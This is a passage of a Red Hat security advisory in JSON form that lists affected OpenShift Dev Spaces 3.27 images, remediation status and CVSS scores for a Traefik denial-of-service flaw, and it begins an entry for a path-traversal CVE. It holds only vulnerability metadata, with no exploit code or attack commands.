"summary": "https://github.com/traefik/traefik/security/advisories/GHSA-cwjm-3f7h-9hwq",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-cwjm-3f7h-9hwq"
}
],
"release_date": "2026-01-15T22:44:05.423000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "traefik: Traefik: Denial of Service via ACME TLS-ALPN fast path resource exhaustion"
},
{
"cve": "CVE-2026-23745",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-01-16T23:01:26.508727+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
